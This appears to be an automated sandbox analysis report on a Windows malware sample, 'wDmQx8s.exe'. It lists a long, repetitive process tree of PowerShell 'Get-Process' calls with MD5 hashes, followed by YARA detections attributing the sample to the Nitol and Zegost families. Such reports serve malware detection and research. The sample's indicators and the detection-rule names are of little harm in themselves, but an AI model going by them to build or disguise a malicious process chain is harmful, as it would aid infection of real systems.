"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7480 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 6336 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7420 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7772 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 1744 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 404 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 1628 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 6400 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 6192 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7100 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7032 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 2656 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 1276 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 2264 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 1056 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 4044 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 4428 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 792 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 3912 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 3900 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 4140 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 6564 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 3796 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 1968 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 6020 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 5272 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7264 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 6012 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 2212 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 5196 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 3916 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 6952 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 5868 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7344 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7756 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7044 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 2896 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7464 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7456 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 2872 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7860 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 5808 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 5720 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 2908 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 3120 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 6636 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 6696 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 6152 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 1104 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 4248 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 2664 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 3628 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 2792 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 3760 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 3176 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 4144 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 8152 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7584 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 8068 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 5368 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 3796 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 1808 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 332 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7264 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 1228 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7192 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 5264 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 5944 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 6972 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 6872 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 1420 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7352 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 4336 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7728 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7332 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7388 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7436 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7860 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 6656 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
rundll32.exe (PID: 2720 cmdline:
C:\Windows \System32\ rundll32.e xe C:\Wind ows\System 32\shell32 .dll,SHCre ateLocalSe rverRunDll {9aa46009 -3ce0-458a -a354-7156 10a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
svchost.exe (PID: 7628 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Nitol | No Attribution |
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Zegost | Yara detected Zegost | Joe Security | ||
JoeSecurity_Nitol | Yara detected Nitol | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Zegost | Yara detected Zegost | Joe Security | ||
JoeSecurity_Nitol | Yara detected Nitol | Joe Security | ||
JoeSecurity_Nitol | Yara detected Nitol | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Zegost | Yara detected Zegost | Joe Security | ||
JoeSecurity_Nitol | Yara detected Nitol | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |